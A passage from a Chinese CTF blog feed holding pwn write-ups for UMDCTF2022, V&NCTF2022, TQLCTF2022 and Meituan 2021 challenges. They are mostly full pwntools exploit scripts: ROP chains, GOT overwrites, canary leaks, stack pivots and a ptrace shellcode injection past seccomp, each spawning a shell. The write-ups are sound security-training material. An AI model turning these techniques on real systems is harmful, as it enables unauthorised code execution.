class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">mainAct = <span class="number">0x0000000006F76C0</span></span><br><span class="line">showDescription = <span class="number">0x0000000006E84F0</span></span><br><span class="line">win = <span class="number">0x000000000400BED</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;What is the name of your act?&#x27;</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;How long do you want the show description to be?&#x27;</span>,<span class="built_in">str</span>(<span class="number">0x80</span>))</span><br><span class="line">payload = <span class="string">&#x27;f&#x27;</span>*<span class="number">0x88</span> + p64(<span class="number">0x71</span>) + <span class="string">&#x27;f&#x27;</span>*<span class="number">0x60</span> + p64(win)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;Describe the show for us:&#x27;</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h1 id="Tracestory"><a href="#Tracestory" class="headerlink" title="Tracestory"></a>Tracestory</h1><blockquote><p>I am trying to figure out the end of this story, but I am not able to read it. Could you help me figure out what it is?</p><p><strong>Author</strong>: WittsEnd2</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0.cloud.chals.io 15148</span><br></pre></td></tr></table></figure><p>tag: seccomp shellcode </p></blockquote><h2 id="概要-1"><a href="#概要-1" class="headerlink" title="概要"></a>概要</h2><p>一个<code>seccomp</code>题目，父进程写汇编利用<code>ptrace</code>将<code>shellcode</code>注入到子进程的<code>text</code>段中来绕过<code>seccomp</code>。</p><h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>在<code>seccomp</code>规则之前，父进程就<code>fork</code>出了子进程。后父进程读取用户输入，调用<code>setup_seccomp</code>，然后执行受<code>seccomp</code>过滤的代码。</p><p>利用<code>ptrace</code>可以不受<code>seccomp</code>的限制，控制子进程。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// seccomp-tools dump ./trace_story</span></span><br><span class="line">line  CODE  JT   JF      K</span><br><span class="line">=================================</span><br><span class="line"> <span class="number">0000</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000004</span>  A = arch</span><br><span class="line"> <span class="number">0001</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x18</span> <span class="number">0xc000003e</span>  <span class="keyword">if</span> (A != ARCH_X86_64) <span class="keyword">goto</span> <span class="number">0026</span></span><br><span class="line"> <span class="number">0002</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000000</span>  A = sys_number</span><br><span class="line"> <span class="number">0003</span>: <span class="number">0x35</span> <span class="number">0x00</span> <span class="number">0x01</span> <span class="number">0x40000000</span>  <span class="keyword">if</span> (A &lt; <span class="number">0x40000000</span>) <span class="keyword">goto</span> <span class="number">0005</span></span><br><span class="line"> <span class="number">0004</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x15</span> <span class="number">0xffffffff</span>  <span class="keyword">if</span> (A != <span class="number">0xffffffff</span>) <span class="keyword">goto</span> <span class="number">0026</span></span><br><span class="line"> <span class="number">0005</span>: <span class="number">0x15</span> <span class="number">0x13</span> <span class="number">0x00</span> <span class="number">0x00000003</span>  <span class="keyword">if</span> (A == close) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0006</span>: <span class="number">0x15</span> <span class="number">0x12</span> <span class="number">0x00</span> <span class="number">0x00000004</span>  <span class="keyword">if</span> (A == stat) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0007</span>: <span class="number">0x15</span> <span class="number">0x11</span> <span class="number">0x00</span> <span class="number">0x00000005</span>  <span class="keyword">if</span> (A == fstat) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0008</span>: <span class="number">0x15</span> <span class="number">0x10</span> <span class="number">0x00</span> <span class="number">0x00000006</span>  <span class="keyword">if</span> (A == lstat) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0009</span>: <span class="number">0x15</span> <span class="number">0x0f</span> <span class="number">0x00</span> <span class="number">0x0000000a</span>  <span class="keyword">if</span> (A == mprotect) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0010</span>: <span class="number">0x15</span> <span class="number">0x0e</span> <span class="number">0x00</span> <span class="number">0x0000000c</span>  <span class="keyword">if</span> (A == brk) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0011</span>: <span class="number">0x15</span> <span class="number">0x0d</span> <span class="number">0x00</span> <span class="number">0x00000015</span>  <span class="keyword">if</span> (A == access) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0012</span>: <span class="number">0x15</span> <span class="number">0x0c</span> <span class="number">0x00</span> <span class="number">0x00000018</span>  <span class="keyword">if</span> (A == sched_yield) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0013</span>: <span class="number">0x15</span> <span class="number">0x0b</span> <span class="number">0x00</span> <span class="number">0x00000020</span>  <span class="keyword">if</span> (A == dup) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0014</span>: <span class="number">0x15</span> <span class="number">0x0a</span> <span class="number">0x00</span> <span class="number">0x00000021</span>  <span class="keyword">if</span> (A == dup2) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0015</span>: <span class="number">0x15</span> <span class="number">0x09</span> <span class="number">0x00</span> <span class="number">0x00000038</span>  <span class="keyword">if</span> (A == clone) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0016</span>: <span class="number">0x15</span> <span class="number">0x08</span> <span class="number">0x00</span> <span class="number">0x0000003c</span>  <span class="keyword">if</span> (A == <span class="built_in">exit</span>) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0017</span>: <span class="number">0x15</span> <span class="number">0x07</span> <span class="number">0x00</span> <span class="number">0x0000003e</span>  <span class="keyword">if</span> (A == kill) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0018</span>: <span class="number">0x15</span> <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00000050</span>  <span class="keyword">if</span> (A == chdir) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0019</span>: <span class="number">0x15</span> <span class="number">0x05</span> <span class="number">0x00</span> <span class="number">0x00000051</span>  <span class="keyword">if</span> (A == fchdir) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0020</span>: <span class="number">0x15</span> <span class="number">0x04</span> <span class="number">0x00</span> <span class="number">0x00000060</span>  <span class="keyword">if</span> (A == gettimeofday) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0021</span>: <span class="number">0x15</span> <span class="number">0x03</span> <span class="number">0x00</span> <span class="number">0x00000065</span>  <span class="keyword">if</span> (A == ptrace) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0022</span>: <span class="number">0x15</span> <span class="number">0x02</span> <span class="number">0x00</span> <span class="number">0x00000066</span>  <span class="keyword">if</span> (A == getuid) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0023</span>: <span class="number">0x15</span> <span class="number">0x01</span> <span class="number">0x00</span> <span class="number">0x00000068</span>  <span class="keyword">if</span> (A == getgid) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0024</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x01</span> <span class="number">0x000000e7</span>  <span class="keyword">if</span> (A != exit_group) <span class="keyword">goto</span> <span class="number">0026</span></span><br><span class="line"> <span class="number">0025</span>: <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x7fff0000</span>  <span class="keyword">return</span> ALLOW</span><br><span class="line"> <span class="number">0026</span>: <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000000</span>  <span class="keyword">return</span> KILL</span><br></pre></td></tr></table></figure><h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>子进程是一个死循环，我们可以覆盖循环开头的<code>text</code>段。</p><p>用<code>ptrace</code>函数附加到子进程流程：</p><ul><li>追踪指定<code>pid</code>的进程：<code>ptrace(PTRACE_ATTACH, CHILD_PID, 0, 0)</code></li><li>等待子进程附加<code>wait(0)</code></li><li>往内存地址写入一个字节，地址由<code>addr</code>给出：<code>ptrace(PTRACE_POKETEXT, CHILD_PID, CODE_ADDRESS, 8_BYTES_OF_CODE)</code></li><li>结束追踪：<code>ptrace(PTRACE_DETACH, CHILD_PID, 0, 0)</code></li><li>attach -&gt; write_text -&gt; detach -&gt; go back to beginning</li></ul><p><a href="https://www.jianshu.com/p/b1f9d6911c90">ptrace函数参考</a></p><h2 id="exp-2"><a href="#exp-2" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.binary = ELF(<span class="string">&#x27;trace_story&#x27;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">p = process(<span class="string">&#x27;./trace_story&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;pid: &quot;</span>)</span><br><span class="line">pid = <span class="built_in">int</span>(p.recvline().strip())</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;pid: &quot;</span>,pid)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;begin:&quot;</span></span><br><span class="line">payload += shellcraft.ptrace(constants.linux.PTRACE_ATTACH, pid, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">binsh = asm(shellcraft.sh())</span><br><span class="line">start_addr = <span class="number">0x401789</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">int</span>(<span class="built_in">len</span>(binsh)/<span class="number">8</span>)):</span><br><span class="line">    shellcode = u64(binsh[i * <span class="number">8</span>:<span class="number">8</span>+(i*<span class="number">8</span>)])</span><br><span class="line">    payload += shellcraft.ptrace(constants.linux.PTRACE_POKETEXT, pid, start_addr + (i * <span class="number">8</span>), shellcode)</span><br><span class="line">payload += shellcraft.ptrace(constants.linux.PTRACE_DETACH, pid, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">payload += <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">jmp begin</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Input: \n&#x27;</span>, asm(payload))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><p><a href="https://elbiazo.com/posts/umdctf-2022/">参考1</a>  <a href="https://github.com/datajerk/ctf-write-ups/tree/master/umdctf2022/trace_story">参考2</a></p>]]></content>
    
    
    <summary type="html">UMDCTF2022</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
    <category term="python2" scheme="https://trick.ink/tags/python2/"/>
    
    <category term="ROP" scheme="https://trick.ink/tags/ROP/"/>
    
    <category term="fmt" scheme="https://trick.ink/tags/fmt/"/>
    
    <category term="heap-overflow" scheme="https://trick.ink/tags/heap-overflow/"/>
    
    <category term="seccomp" scheme="https://trick.ink/tags/seccomp/"/>
    
    <category term="shellcode" scheme="https://trick.ink/tags/shellcode/"/>
    
  </entry>
  
  <entry>
    <title>V&amp;NCTF2022</title>
    <link href="https://trick.ink/article/V&amp;NCTF2022/"/>
    <id>https://trick.ink/article/V&amp;NCTF2022/</id>
    <published>2022-02-25T07:27:23.000Z</published>
    <updated>2023-02-09T17:18:26.336Z</updated>
    
    <content type="html"><![CDATA[<h1 id="V-amp-NCTF2022"><a href="#V-amp-NCTF2022" class="headerlink" title="V&amp;NCTF2022"></a>V&amp;NCTF2022</h1><h1 id="clear-got"><a href="#clear-got" class="headerlink" title="clear_got"></a>clear_got</h1><p><img src="/article/V&NCTF2022/image-20220225153956554.png" alt="image-20220225153956554"></p><p><img src="/article/V&NCTF2022/image-20220225153934386.png" alt="image-20220225153934386"></p><p><img src="/article/V&NCTF2022/image-20220225153923845.png" alt="image-20220225153923845"></p><h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>栈溢出。利用end2函数泄露libc，再回到main函数的 <code>mov eax, 0</code>，调用sysread写system地址到 <code>puts@got</code> ，最后 <code>call puts</code> 即 getshell。</p><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;clear_got&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">main_addr = elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">libc_main_got = elf.got[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">syscall = <span class="number">0x00000000040077E</span></span><br><span class="line">syswrite = <span class="number">0x0000000000400774</span></span><br><span class="line">pop_rdi = <span class="number">0x00000000004007f3</span></span><br><span class="line">pop_rsi_r15 = <span class="number">0x00000000004007f1</span></span><br><span class="line">bss = <span class="number">0x60107C</span></span><br><span class="line">mov_eax = <span class="number">0x00000000040075C</span></span><br><span class="line">call_puts = <span class="number">0x00000000040071E</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;competition.///&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x68</span> + p64(pop_rdi) + p64(<span class="number">1</span>) + p64(pop_rsi_r15) + p64(libc_main_got) + p64(<span class="number">0</span>) + p64(syswrite) </span><br><span class="line">payload += p64(mov_eax) + p64(pop_rdi) + p64(<span class="number">0</span>) + p64(pop_rsi_r15) + p64(puts_got)*<span class="number">2</span> + p64(syscall) </span><br><span class="line">payload += p64(pop_rdi) + p64(puts_got+<span class="number">8</span>) + p64(call_puts)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">libc_main = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">libc_base = libc_main - libc.sym[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">log.success(<span class="string">&#x27;libc_main: &#x27;</span> + <span class="built_in">hex</span>(libc_main))</span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">payload = p64(system_addr) + <span class="string">&#x27;/bin/sh\x00&#x27;</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">V&amp;NCTF2022</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
  </entry>
  
  <entry>
    <title>TQLCTF2022</title>
    <link href="https://trick.ink/article/TQLCTF2022/"/>
    <id>https://trick.ink/article/TQLCTF2022/</id>
    <published>2022-02-23T08:06:13.000Z</published>
    <updated>2023-02-09T17:45:09.222Z</updated>
    
    <content type="html"><![CDATA[<h1 id="TQLCTF2022"><a href="#TQLCTF2022" class="headerlink" title="TQLCTF2022"></a>TQLCTF2022</h1><!-- 文章页 配置 --><h1 id="unbelievable-write"><a href="#unbelievable-write" class="headerlink" title="unbelievable_write"></a>unbelievable_write</h1><h2 id="libc-2-31"><a href="#libc-2-31" class="headerlink" title="libc-2.31"></a>libc-2.31</h2><p>没有泄露，没有pie。</p><p>c1函数malloc + readline后立即free掉了堆块。</p><p>c2函数可以堆上任意地址free，难点在于size检查。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">filename = <span class="string">&#x27;pwn2022&#x27;</span></span><br><span class="line">p = process(filename)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    cmd(<span class="number">1</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">2</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">target = <span class="number">0x404080</span></span><br><span class="line">prt = <span class="number">0x4040D0</span></span><br><span class="line">free_got = <span class="number">0x404018</span></span><br><span class="line"></span><br><span class="line">free(-<span class="number">0x290</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0x404018</span>)*<span class="number">0x40</span> + p64(<span class="number">0x404080</span>)*<span class="number">0x40</span></span><br><span class="line">add(<span class="number">0x280</span>,payload)</span><br><span class="line">payload = p64(<span class="number">0x4013be</span>) + p64(<span class="number">0x401040</span>) + p64(<span class="number">0x401050</span>)</span><br><span class="line">add(<span class="number">0xa0</span>,payload)</span><br><span class="line">add(<span class="number">0x320</span>,<span class="string">&#x27;1111&#x27;</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">TQLCTF2022</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
  </entry>
  
  <entry>
    <title>美团2021</title>
    <link href="https://trick.ink/article/%E7%BE%8E%E5%9B%A22021/"/>
    <id>https://trick.ink/article/%E7%BE%8E%E5%9B%A22021/</id>
    <published>2021-12-13T12:59:39.000Z</published>
    <updated>2023-02-09T18:03:29.246Z</updated>
    
    <content type="html"><![CDATA[<h1 id="美团2021"><a href="#美团2021" class="headerlink" title="美团2021"></a>美团2021</h1><!-- 文章页 配置 --><h1 id="babyrop"><a href="#babyrop" class="headerlink" title="babyrop"></a>babyrop</h1><p>name 泄露 canary，利用 vuln函数中的 read 写 rop 到 bss 段上，栈迁移后 one_gadget</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;babyrop&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;47.106.172.144&#x27;</span>,<span class="number">65004</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">leave_addr = <span class="number">0x400759</span></span><br><span class="line">pop_rdi = <span class="number">0x400913</span></span><br><span class="line">vuln_read = <span class="number">0x40072E</span></span><br><span class="line">call_puts = <span class="number">0x40086E</span> </span><br><span class="line"></span><br><span class="line"><span class="comment"># leak canary</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;name? \n&#x27;</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">25</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;a&#x27;</span>*<span class="number">25</span>)</span><br><span class="line">canary = u64(p.recv(<span class="number">7</span>).rjust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">log.success(<span class="string">&#x27;canary: &#x27;</span> + <span class="built_in">hex</span>(canary))</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;unlock this challenge\n&#x27;</span>,<span class="built_in">str</span>(<span class="number">0x4009AE</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># read to 0x601800</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span> + p64(canary) + p64(<span class="number">0x601800</span>) + p64(vuln_read)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.sendafter(<span class="string">&#x27;message\n&#x27;</span>,payload)</span><br><span class="line"><span class="comment"># leak libc</span></span><br><span class="line">payload = p64(pop_rdi) + p64(puts_got) + p64(call_puts) </span><br><span class="line">payload += p64(canary) + p64(<span class="number">0x601800</span>-<span class="number">0x28</span>) + p64(leave_addr) </span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">libc_base = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x6f6a0</span></span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">one = libc_base + <span class="number">0x45226</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span> + p64(canary) + p64(<span class="number">0</span>) + p64(one) </span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h1 id="blind-box"><a href="#blind-box" class="headerlink" title="blind_box"></a>blind_box</h1><p>show函数</p><p><img src="/article/%E7%BE%8E%E5%9B%A22021/image-20211219212046664.png" alt="image-20211219212046664"></p><p>libc地址小概率出现7e开头，可以绕过</p><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 